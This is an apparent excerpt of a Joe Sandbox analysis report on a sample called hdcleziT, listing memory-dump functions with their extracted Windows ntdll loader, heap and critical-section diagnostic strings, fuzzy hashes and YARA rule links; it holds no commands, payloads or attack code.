                                                                                                    • <unknown>, xrefs: 24D68D2E, 24D68D81, 24D68E00, 24D68E49, 24D68EC7, 24D68F3E
                                                                                                    • *** then kb to get the faulting stack, xrefs: 24D68FCC
                                                                                                    • The critical section is owned by thread %p., xrefs: 24D68E69
                                                                                                    • The resource is owned shared by %d threads, xrefs: 24D68E2E
                                                                                                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 24D68F26
                                                                                                    • *** An Access Violation occurred in %ws:%s, xrefs: 24D68F3F
                                                                                                    • Go determine why that thread has not released the critical section., xrefs: 24D68E75
                                                                                                    • write to, xrefs: 24D68F56
                                                                                                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 24D68FEF
                                                                                                    • *** enter .exr %p for the exception record, xrefs: 24D68FA1
                                                                                                    • an invalid address, %p, xrefs: 24D68F7F
                                                                                                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 24D68F34
                                                                                                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 24D68DC4
                                                                                                    • a NULL pointer, xrefs: 24D68F90
                                                                                                    • The resource is owned exclusively by thread %p, xrefs: 24D68E24
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                    • API String ID: 0-108210295
                                                                                                    • Opcode ID: f2075ee34315226ddf99caf9cea213b4d2ea6be53c010b107ad33372e3746f13
                                                                                                    • Instruction ID: fa176e70b79c3fb8ae70c123dc6c69074a0daa8bbab2be940624a02d15f964b9
                                                                                                    • Opcode Fuzzy Hash: f2075ee34315226ddf99caf9cea213b4d2ea6be53c010b107ad33372e3746f13
                                                                                                    • Instruction Fuzzy Hash: A881C079A41125FFDB11CF19ACA4D6B3F36AB66714B01008DF50AAF22AE3758521CE72
                                                                                                    Function 24D32349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                    • API String ID: 0-2160512332
                                                                                                    • Opcode ID: 0373de3ae19911b46482f5c7b44bb8596fb952a4f7e967df81e0c71e5fb5bb94
                                                                                                    • Instruction ID: 33b2db4834b6cc1586a5642d99e90ba1f4cfe6d1868aea19464955af52be3dad
                                                                                                    • Opcode Fuzzy Hash: 0373de3ae19911b46482f5c7b44bb8596fb952a4f7e967df81e0c71e5fb5bb94
                                                                                                    • Instruction Fuzzy Hash: 08924A71A08781AFE721CF25C880B5BBBE9BB84754F00492DFA94DB291D774E944CF92
                                                                                                    Function 24CE8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • Critical section address, xrefs: 24D25425, 24D254BC, 24D25534
                                                                                                    • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 24D254CE
                                                                                                    • double initialized or corrupted critical section, xrefs: 24D25508
                                                                                                    • 8, xrefs: 24D252E3
                                                                                                    • Critical section address., xrefs: 24D25502
                                                                                                    • Address of the debug info found in the active list., xrefs: 24D254AE, 24D254FA
                                                                                                    • corrupted critical section, xrefs: 24D254C2
                                                                                                    • Critical section debug info address, xrefs: 24D2541F, 24D2552E
                                                                                                    • Thread is in a state in which it cannot own a critical section, xrefs: 24D25543
                                                                                                    • undeleted critical section in freed memory, xrefs: 24D2542B
                                                                                                    • Thread identifier, xrefs: 24D2553A
                                                                                                    • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 24D254E2
                                                                                                    • Invalid debug info address of this critical section, xrefs: 24D254B6
                                                                                                    • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 24D2540A, 24D25496, 24D25519
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                    • API String ID: 0-2368682639
                                                                                                    • Opcode ID: f74c92131695ad3c3c06def476e1f8919a125c701c31dc6bd8a5681be2262bb1
                                                                                                    • Instruction ID: 1b6aa38a08ab20ae15facf597f3fd63ed9962c43c36e528558a8c2d6c0a5a28b
                                                                                                    • Opcode Fuzzy Hash: f74c92131695ad3c3c06def476e1f8919a125c701c31dc6bd8a5681be2262bb1
                                                                                                    • Instruction Fuzzy Hash: 87818971A04658FFEB10CF99C8A4FAEBBFABB08714F104159E508BB285D375A941CB60
                                                                                                    Function 24CCAD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                    • API String ID: 0-3197712848
                                                                                                    • Opcode ID: 50635fd8c740b517c34ede7f728f4b3bf15e8f8978a828ad6f56de5068cb6271
                                                                                                    • Instruction ID: 4ed4a2f02b275fb2a51425b0817005cab19c36038a894772e577ea71661b7a51
                                                                                                    • Opcode Fuzzy Hash: 50635fd8c740b517c34ede7f728f4b3bf15e8f8978a828ad6f56de5068cb6271
                                                                                                    • Instruction Fuzzy Hash: FD12D0B1A09351DFD321CF29C894BAAB7E2FF84704F04095DF9899B291E735DA44CB92
                                                                                                    Function 24D60CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                                    • API String ID: 0-1357697941
                                                                                                    • Opcode ID: 6a0f005a0d47bd55adf6d466f25b4afc08eeec628a74db74e84af48b0c92d313
                                                                                                    • Instruction ID: 86856cb53799bbb5b8a1fd954fdfb7bf68d1c44951d4f13e9dd4fa292466982b
                                                                                                    • Opcode Fuzzy Hash: 6a0f005a0d47bd55adf6d466f25b4afc08eeec628a74db74e84af48b0c92d313
                                                                                                    • Instruction Fuzzy Hash: 76F13931A00266EFDB17CF68E490BAABBF6FF09304F44845DE5829B652D734A985CF50
                                                                                                    Function 24D60274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                    • API String ID: 0-1700792311
                                                                                                    • Opcode ID: 704f4ffd446ef0a44e1a1a15ba5997af3a15cee3055125a6fdc7c00af6b55dbb
                                                                                                    • Instruction ID: 3ebf73482c274ac99f124acb13a26c463f7ec76cf21144eb437d215027cee816
                                                                                                    • Opcode Fuzzy Hash: 704f4ffd446ef0a44e1a1a15ba5997af3a15cee3055125a6fdc7c00af6b55dbb
                                                                                                    • Instruction Fuzzy Hash: 23D1D035A00695DFDB13CFA8E450AADBBF2FF5A304F44805DE946AB252D734A981CF50
                                                                                                    Function 24D34DD7 Relevance: 8.8, Strings: 7, Instructions: 86COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 24D34E38
                                                                                                    • Execute '.cxr %p' to dump context, xrefs: 24D34EB1
                                                                                                    • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 24D34DF5
                                                                                                    • LdrpProtectedCopyMemory, xrefs: 24D34DF4
                                                                                                    • minkernel\ntdll\ldrutil.c, xrefs: 24D34E06
                                                                                                    • LdrpGenericExceptionFilter, xrefs: 24D34DFC
                                                                                                    • ***Exception thrown within loader***, xrefs: 24D34E27
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                                                                    • API String ID: 0-2973941816
                                                                                                    • Opcode ID: 1e920670e81ee462596a1d327b787837c3254eb83c10e82f33e5820f43b1a9b7
                                                                                                    • Instruction ID: bdc86a83c36c4dd0e5354268bedb6eff6462e3fff3d53d61a4241523635f76ff
                                                                                                    • Opcode Fuzzy Hash: 1e920670e81ee462596a1d327b787837c3254eb83c10e82f33e5820f43b1a9b7
                                                                                                    • Instruction Fuzzy Hash: 662126721440017BE3058BAC9E91E367FEEFB855E4F10011DF221BB599CA58FE00CE61
                                                                                                    Function 24CBADE0 Relevance: 8.1, Strings: 6, Instructions: 573COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                                                    • API String ID: 0-4098886588
                                                                                                    • Opcode ID: 5270e6d284584e14945266e82a3f7c6e9c9baa7b77ddc9e5baa381ad13cf2dce
                                                                                                    • Instruction ID: 2b72537aa0a7d7a62a8c4989f2a3fd5e5608f3f316725405fc2981cde77bb539
                                                                                                    • Opcode Fuzzy Hash: 5270e6d284584e14945266e82a3f7c6e9c9baa7b77ddc9e5baa381ad13cf2dce
                                                                                                    • Instruction Fuzzy Hash: 5232A175A042698BEF22CF59C894BDEBBB6BF44340F1441E9E888A7251E7719F81CF50
                                                                                                    Function 00402870 Relevance: 7.8, Strings: 6, Instructions: 273COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000001.2169352887.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_1_400000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: <$VUUU$^$gfff$gfff$yxxx
                                                                                                    • API String ID: 0-316815425
                                                                                                    • Opcode ID: b4c5ea56440ed441900d5c47d19ed93f1dc6d542dd1d6fd463edbf0af6dc037a
                                                                                                    • Instruction ID: acdc47fa774a7f9690a8a9d900611673f9bdcf880e58a562d9d8aaaed250525f
                                                                                                    • Opcode Fuzzy Hash: b4c5ea56440ed441900d5c47d19ed93f1dc6d542dd1d6fd463edbf0af6dc037a
                                                                                                    • Instruction Fuzzy Hash: 6B81D471B005054BDF2CCD5DDA987AA73A6EBD4304F28817AD809EF3D1EA799E058A44
                                                                                                    Function 24CE63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                    • API String ID: 0-792281065
                                                                                                    • Opcode ID: 19d7c66cfe2851c32e11b4436b323ce87085773072db7be2294dc0afe8bf5b57
                                                                                                    • Instruction ID: 87828449faed0c7128a0de4633b1150daba18f82280119bf511d56071b5c9e9c
                                                                                                    • Opcode Fuzzy Hash: 19d7c66cfe2851c32e11b4436b323ce87085773072db7be2294dc0afe8bf5b57
                                                                                                    • Instruction Fuzzy Hash: AF911630F01625ABEB16DF29C8A4B6A7BA3FF50B28F40416DE9147B6C6D7749801CB91
                                                                                                    Function 24CE2CF0 Relevance: 7.7, Strings: 6, Instructions: 218COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • \WinSxS\, xrefs: 24CE2E23
                                                                                                    • SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx, xrefs: 24D22706
                                                                                                    • @, xrefs: 24CE2E4D
                                                                                                    • SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx, xrefs: 24D2276F
                                                                                                    • .Local\, xrefs: 24CE2D91
                                                                                                    • SXS: Unable to open registry key %wZ Status = 0x%08lx, xrefs: 24D2279C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: .Local\$@$SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx$SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx$SXS: Unable to open registry key %wZ Status = 0x%08lx$\WinSxS\
                                                                                                    • API String ID: 0-3926108909
                                                                                                    • Opcode ID: 9939ec9f61bc78461b6880ce060b55edf041544a004ecdac026bf5d5d0c065a2
                                                                                                    • Instruction ID: 23f557b71f124814034675ed95770e91f3ac40bd378ebd96c67260f07afbd504
                                                                                                    • Opcode Fuzzy Hash: 9939ec9f61bc78461b6880ce060b55edf041544a004ecdac026bf5d5d0c065a2
                                                                                                    • Instruction Fuzzy Hash: 8481BF712083419FD702CF19C890B6BBBE6AF95704F04895DF984CF28AD774DA44CBA2
                                                                                                    Function 24CA645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 24D09A11, 24D09A3A
                                                                                                    • apphelp.dll, xrefs: 24CA6496
                                                                                                    • Loading the shim user DLL failed with status 0x%08lx, xrefs: 24D09A2A
                                                                                                    • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 24D099ED
                                                                                                    • Getting the shim user exports failed with status 0x%08lx, xrefs: 24D09A01
                                                                                                    • LdrpInitShimEngine, xrefs: 24D099F4, 24D09A07, 24D09A30
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                    • API String ID: 0-204845295
                                                                                                    • Opcode ID: 6d6eaf9dc6781dc9ac3abc11c7f3ec3539e5cd9d4c68d6f12d72bfa2a3c76f8b
                                                                                                    • Instruction ID: 9f1f74319db150d613b464c077aa417a02e3945b4230f3287ffc54ad3735fcdb
                                                                                                    • Opcode Fuzzy Hash: 6d6eaf9dc6781dc9ac3abc11c7f3ec3539e5cd9d4c68d6f12d72bfa2a3c76f8b
                                                                                                    • Instruction Fuzzy Hash: 9A518171608314AFE321DF28C890F6B77EAFB94B44F00496DF5959B2A4DB30D944CB92
                                                                                                    Function 24CEC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 24D28181, 24D281F5
                                                                                                    • LdrpInitializeImportRedirection, xrefs: 24D28177, 24D281EB
                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 24CEC6C3
                                                                                                    • LdrpInitializeProcess, xrefs: 24CEC6C4
                                                                                                    • Loading import redirection DLL: '%wZ', xrefs: 24D28170
                                                                                                    • Unable to build import redirection Table, Status = 0x%x, xrefs: 24D281E5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                    • API String ID: 0-475462383
                                                                                                    • Opcode ID: 076cecf89185d6642e76722ed9aff36e7a456388445a5e1b2d7a4a8a625b3947
                                                                                                    • Instruction ID: 7ee1287c800ab48dd07ff8eb4089950463f6dbcd2a12df88c89305db57909868
                                                                                                    • Opcode Fuzzy Hash: 076cecf89185d6642e76722ed9aff36e7a456388445a5e1b2d7a4a8a625b3947
                                                                                                    • Instruction Fuzzy Hash: 31310472744741AFD211DF2CCD55E2A7BD6EF94714F000668F944AB29AE720DC04CBA2
                                                                                                    Function 24CE2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 24D22180
                                                                                                    • SXS: %s() passed the empty activation context, xrefs: 24D22165
                                                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 24D221BF
                                                                                                    • RtlGetAssemblyStorageRoot, xrefs: 24D22160, 24D2219A, 24D221BA
                                                                                                    • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 24D2219F
                                                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 24D22178
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                    • API String ID: 0-861424205
                                                                                                    • Opcode ID: 6d43cf13aa6bff3e8ed2d1974506706284d7dc03e38252d94f124789f376e9e0
                                                                                                    • Instruction ID: a2dc694c34fd55560d88cbae2f06798190dcd346c636c16ae2768e0c7d2e735f
                                                                                                    • Opcode Fuzzy Hash: 6d43cf13aa6bff3e8ed2d1974506706284d7dc03e38252d94f124789f376e9e0
                                                                                                    • Instruction Fuzzy Hash: 2131E976F02514B7F712CA9ACC90F6B7BEADB64654F05006DFA08BF149D7309A01CAA1
                                                                                                    Function 24CF096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 24CF2DF0: LdrInitializeThunk.NTDLL ref: 24CF2DFA
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 24CF0BA3
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 24CF0BB6
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 24CF0D60
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 24CF0D74
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 1404860816-0
                                                                                                    • Opcode ID: e1f3db8dc65914203d609d0fc90627f4e1330dcee9d939438a0e3b8a25eb72f0
                                                                                                    • Instruction ID: 2efcd3f323526462888f463b0e754eeb98113cb80410081e1f8f3af9e284fcea
                                                                                                    • Opcode Fuzzy Hash: e1f3db8dc65914203d609d0fc90627f4e1330dcee9d939438a0e3b8a25eb72f0
                                                                                                    • Instruction Fuzzy Hash: 30429C71A00715DFDB61CF28C880B9AB7F5FF14314F0545AAE989EB246E774AA84CF60
                                                                                                    Function 24D3CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 24D3CFBD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CallFilterFunc@8
                                                                                                    • String ID: @$@4Cw@4Cw
                                                                                                    • API String ID: 4062629308-3101775584
                                                                                                    • Opcode ID: 2e89bb2db40f85084d4fc943a5780d9dcac904cda9470e0086a5713c7ce66cf4
                                                                                                    • Instruction ID: f7002d8e6d52c7c8cc43d9526ba798426c8e8a72bbd86a2f3705363d05cde2b4
                                                                                                    • Opcode Fuzzy Hash: 2e89bb2db40f85084d4fc943a5780d9dcac904cda9470e0086a5713c7ce66cf4
                                                                                                    • Instruction Fuzzy Hash: 8C418C72A00224DFDB218FA9D840AAEBBBAFF54B00F00442EF955EB258D774D945CF61
                                                                                                    Function 24CBA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                    • API String ID: 0-379654539
                                                                                                    • Opcode ID: 0e79462ad857674807920aedee99c7d3c8f2a659648c87c6d92d622dad7388af
                                                                                                    • Instruction ID: 81f7bccda3a69854d8a2eba0668ef341bd854a5495deff4259802918480609af
                                                                                                    • Opcode Fuzzy Hash: 0e79462ad857674807920aedee99c7d3c8f2a659648c87c6d92d622dad7388af
                                                                                                    • Instruction Fuzzy Hash: 8DC179742083868FD711CF19C040B5ABBE6BF84704F0489AEF9D99B691E736CA49CF52
                                                                                                    Function 24CE8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 24CE8421
                                                                                                    • @, xrefs: 24CE8591
                                                                                                    • LdrpInitializeProcess, xrefs: 24CE8422
                                                                                                    • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 24CE855E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                    • API String ID: 0-1918872054
                                                                                                    • Opcode ID: f8fcf2e8ed97cb50ef44fd77fbf35b1008a1276fb52468a41f5d8cc6afe075d5
                                                                                                    • Instruction ID: a329df4077b24d4260e3d5205bda3bc1e7342f35d40d256ca1f776719582bc3e
